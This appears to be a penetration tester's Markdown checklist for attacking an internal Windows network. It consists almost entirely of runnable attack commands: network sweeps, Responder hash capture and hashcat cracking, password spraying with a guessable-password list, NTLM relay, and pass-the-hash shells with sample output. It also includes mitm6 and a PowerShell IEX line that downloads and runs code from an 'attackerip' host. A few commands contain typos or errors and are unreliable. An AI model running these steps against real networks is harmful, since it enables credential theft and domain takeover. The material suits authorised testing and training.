# Basic Internal Network test * [ ] Start responder * [ ] Start nessus * [ ] Check outbound internet access ## Host Discovery If not given targets list try Nmap Ping Scan Private Ranges and start responder ``` sudo responder -I eth0 nmap -sn -n 10.0.0.0/8 | tee -a Targets.tmp nmap -sn -n 172.16.0.0/12 | tee -a Targets.tmp nmap -sn -n 192.168.0.0/16 | tee -a Targets.tmp # Loud so only use if required masscan 10.0.0.0/8 -p80,445,22 --rate 100000000 | tee -a Targets.tmp masscan 172.16.0.0/12 -p80,445,22 --rate 100000000 | tee -a Targets.tmp masscan 192.168.0.0/16 -p80,445,22 --rate 100000000 | tee -a Targets.tmp #Note down IP addresses from responder responder -I eth0 cat /usr/share/responder/logs/Responder-Session.log | grep answer | awk '{print $11}' | sort -u | tee -a Targets.tmp #Note current IP address & scan range ifconfig nmap --top-ports 10 10.0.0.1/24 -Pn | tee -a Targets.tmp #netdiscover netdiscover -i eth0 -P #NBTScan nbtscan 192.168.1.0/24 ``` Now cat grep and sort the IP addresses into a file called Targets.txt If given a range do the following ``` nmap -sn 192.168.10.0/24 -n | grep report | cut -d ' ' -f 5 | tee -a ipaddresses.txt | tee -a targets.txt nmap -sn 192.168.10.0/24 | grep report | cut -d ' ' -f 5- | tee -a host-ip.txt ``` ### Nmap Scans ``` mkdir Scans nmap -p 21 -n --open -iL targets.txt -oN Scans/ftp nmap -p 22 -n --open -iL targets.txt -oN Scans/ssh nmap -p 23 -n --open -iL targets.txt -oN Scans/telnet nmap -p 80 -n --open -iL targets.txt -oN Scans/http nmap -p 443 -n --open -iL targets.txt -oN Scans/https nmap -p 445 -n --open -iL targets.txt -oN Scans/smb nmap -p 3389 -n --open -iL targets.txt -oN Scans/rdp cat Scans/ftp | grep for | cut -d " " -f 5 > ftphosts.txt cat Scans/ssh | grep for | cut -d " " -f 5 > sshhosts.txt cat Scans/telnet | grep for | cut -d " " -f 5 > telnethosts.txt cat Scans/http | grep for | cut -d " " -f 5 > httphosts.txt cat Scans/https | grep for | cut -d " " -f 5 > httpshosts.txt cat Scans/smb | grep for | cut -d " " -f 5 > smbhosts.txt cat Scans/rdp | grep for | cut -d " " -f 5 > rdphosts.txt ``` ## Scanning Start Nessus on discovered IP addresses Run networkscan.sh against all targets.txt using rush Modify if running slowly (thousands of hosts) and reduce the amount of ports it is looking at. Find OS version with cme ``` crackmapexec smb smbhosts.txt | tee -a smb-os-versionst.txt ``` Make a note of the domain etc and older OS's ## Network Service Scan Run this as root as some of the nmap scans require privs and sudo can be flakey Requirements ``` go get -u github.com/shenwei356/rush/ ``` Usage ``` ~/go/bin/rush -i targets.txt -c "./networkscan.sh {}" ``` ``` mkdir -p networkscan cd networkscan target=$(echo $1 | cut -d "/" -f 3) userlist=~/jdksec/Payloads/top-usernames-shortlist.txt passlist=~/jdksec/Payloads/darkweb2017-top100.txt line="\n=====================\n" mkdir -p $target cd $target mkdir nmap-basic mkdir nmap-udp echo "#####################################################################" | tee -a report-$target.txt echo "Scan report for $target" |tee -a report-$target.txt echo "#####################################################################" | tee -a report-$target.txt echo "$line Nmap Scan for $target...$line " | tee -a report-$target.txt ports=$(nmap -Pn -p- --min-rate=1000 -T4 $target | grep "^[0-9]" | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) echo "## Open Ports:\n";for i in $(echo $ports | sed 's/,/\n/g'); do echo $target:$i; done | tee -a ports-$target.txt echo "\n" nmap -Pn -sC -sV -p $ports $target -oN nmap-basic/$target cat nmap-basic/* >> report-$target.txt echo "$line Nmap UDP ...$line " | tee -a report-$target.txt sudo nmap -sUVC --open $target --top-ports 20 -oN nmap-udp/$target cat nmap-udp/* >> report-$target.txt cd nmap-basic/ grep -Hari "/tcp" | grep -v ":|" >> ../services-$target.txt cd ../ cd nmap-udp/ grep -Hari "/udp" | grep -v filtered >> ../services-$target.txt cd ../ echo "$line Services ...$line " | tee -a report-$target.txt cat services-$target.txt | tee -a report-$target.txt echo "$line Ports ...$line " | tee -a report-$target.txt cat ports-$target.txt | tee -a report-$target.txt mv nmap-basic/$target nmap-tcp-$target.txt mv nmap-udp/$target nmap-udp-$target.txt /bin/rm -rf nmap-udp /bin/rm -rf nmap-basic ``` ### Gather Webservers ``` cat networkscan/*/service* | cut -d '/' -f 1 | tee -a ports.txt | ~/go/bin/httprobe| tee -a webservers.txt ``` Now open in firefox, check default creds etc ``` for i in $(cat webservers.txt); do firefox $i; sleep 1; done ``` ### Scan with nuclei ``` cat webservers.txt | ~/go/bin/nuclei -nts -nc -silent | tee -a vulnscan.txt ``` ### Basic Vuln scan quick wins ``` msfconsole -qx "color false;use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set rhosts file://rdphosts.txt; set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt msfconsole -qx "color false;use auxiliary/scanner/smb/smb_ms17_010; set rhosts file://smbhosts.txt set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt ``` ## Check responder for hashes and crack with hashcat ``` cat /usr/share/responder/logs/*NTLM* | sort -u >> hashes.txt; cat hashes.txt | sort -u -o hashes.txt hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt # Much Slower so use npk if possible or cloud cracker wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -r OneRuleToRuleThemAll.rule ``` Once you have some hashes test with several wordlists, if none work then scrape the clients website for words with cewl ``` cewl -w clientwordlist.txt -d 5 -m 8 https://www.clientsite.com/ ``` Then repeat the cracking process with a better password/rule list. ## Domain enumeration Get DC List ``` # Windows command nltest /DCLIST:domain.local # Linux Commands cat /etc/resolv.conf nmap -p 88,389,636 -iL targets.txt --open | tee -a domaincontrollers.txt for i in (cat Targets.txt); do nslookup $i | grep "dc"; done nslookup > set type=all _ldap._tcp.dc._msdcs.DOMAIN ``` Get user list ``` rpcclient -U "domain\\username" 10.0.0.1 (DC) rpcclient $> enumdomusers ``` Copy list of users to "rpcuserlist.txt" file and sort: ``` cat rpcuserlist.txt | cut -d "[" -f 2 | cut -d "]" -f 1 | sort -u > DomainUsers.txt ``` ## Password spray domain users Set a timer for every 30 minutes and rerun this attack. May be worth checking the password lockout policy with the client if in a sensitive environment. ``` msfconsole -q set rhosts domaincontrollerip use auxiliary/scanner/smb/smb_login set SMBDomain domain set USER_FILE DomainUsers.txt set SMBPass firstpassword date << adds a timestamp run ``` When time is up change the password and rerun. Passwords to try: ``` Clientname2019 Location2019 Password12345! Summer2019! Spring2019! Summer2018! Password2018! Welcome2018! Password 2018! Summer@2018 ``` ## Find open file servers ### SMB Map Find open SMB shares which are available unauthenticated ``` for i in $(cat targets.txt);do smbmap -H $i; done | tee -a smbmap-output.txt ``` Find open writable shares and search for authenticated file servers: ``` for i in $(cat targets.txt);do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txt leafpad SMBMap-Output.txt ctrl + f WRITE (Search for writable folders) ``` ## EyeWitness ``` python /root/Data/Tools/EyeWitness/EyeWitness.py --all-protocols -x NmapTCP.xml ``` ## NTLM Relay Modify Responder.conf to turn off HTTP and SMB ``` [Responder Core] ; Servers to start SQL = On SMB = Off << turn off Kerberos = On FTP = On POP = On SMTP = On IMAP = On HTTP = Off << turn off HTTPS = On DNS = On LDAP = On ``` Start responder ``` python Responder.py -I -r -d -w responder -I -r -d -w ``` Create a list of targets with SMB signing disabled. ``` nmap -n -p 137,139,445 --script=smb-security-mode -iL smbhosts.txt | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt ``` Now start ntlmrelayx.py against the targets ``` python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf smbsigningdisabled.txt ``` If you capture a high priv users account it will drop the hashes from the system Now use psexec within metasploit to login to the target ``` msfconsole use exploit/windows/smb/psexec set lhost 192.168.1.1 set rhost 192.168.1.11 set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c exploit ``` Sometimes ntlmrelay fails, to fix, run the following ``` Clone latest impacket cd impacket sudo python3.10 -m pip install . --user python3.10 examples/ntlmrelayx.py -tf ../smbsigningdisabled.txt ``` ## Pass the hash Either will do, once the enumeration has finished upload the csv files to your attacker machine. Then run ``` python ntlmrelayx.py -tf smbsigningdisabled.txt ``` ``` root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 # Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name # Administrator: account's name # aad3b435b51404eeaad3b435b51404ee: Empty LM HASH # C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash ``` ``` root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe E_md4hash wrapper called. HASH PASS: Substituting user supplied NTLM HASH... Microsoft Windows \[Version 6.3.9600\] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami Server\Administrator ``` ``` root@Kali:~# pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount" root@Kali:~# pth-wims -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt" root@Kali:~# pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$ root@Kali:~# pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 ``` ``` root@Kali:~# wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 administrator@192.168.1.25 Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\> ``` ``` root@Kali:~# apt-get update root@Kali:~# apt-get install freerdp-x11 root@Kali:~# xfreerpd /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25 ``` ``` msf > use auxiliary/admin/smb/psexec_command msf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 msf exploit(psexec) > set SMBUser Administrator msf exploit(psexec) > set SMBDomain WORKGROUP msf exploit(psexec) > run [*] Started reverse TCP handler on 192.168.1.24:4444 [*] 192.168.1.25:445 - Connecting to the server... [*] 192.168.1.25:445 - Authenticating to 192.168.1.25:445|WORKGROUP as user 'administrator'... [*] 192.168.1.25:445 - Selecting PowerShell target [*] 192.168.1.25:445 - Executing the payload... [+] 192.168.1.25:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (957999 bytes) to 192.168.1.25 [*] Meterpreter session 1 opened (192.168.1.24:4444 -> 192.168.1.25:49173) at 2017-04-05 22:48:15 +0200 meterpreter > exit ``` This will output the local hashes if you capture a domain admins NTLM hash. Once you have this hash, login to the machine with metasploits psexec pass the hash or psexec.py ## Bloodhound Once on the domain as a windows user run the following: ``` powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/BloodHound.ps1')" powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/SharpHound.exe')" ``` Once on your attacker machine make sure you have bloodhound installed and then execute: ``` neoj4 console bloodhound ``` Visit 127.0.0.1:7687 Enter your password and upload the csv files you extracted from the target. Click queries and then find shortest path to domain admin ### MITM6 ``` git clone https://github.com/fox-it/mitm6.git cd mitm6 mitm6 -d domain.local ``` In a new window ``` ntlmrelayx.py -6 -t ldaps://domaincontrollerip -wh fakewpad.domain.local -l data ``` Wait 30 mins to an hour for the IPV6 to update ``` cd data firefox domain_users_by_group.html ``` Review ntlmrelayx.py output and look for new user and password added when a DA logs in Once on the domain see {% embed url="" %}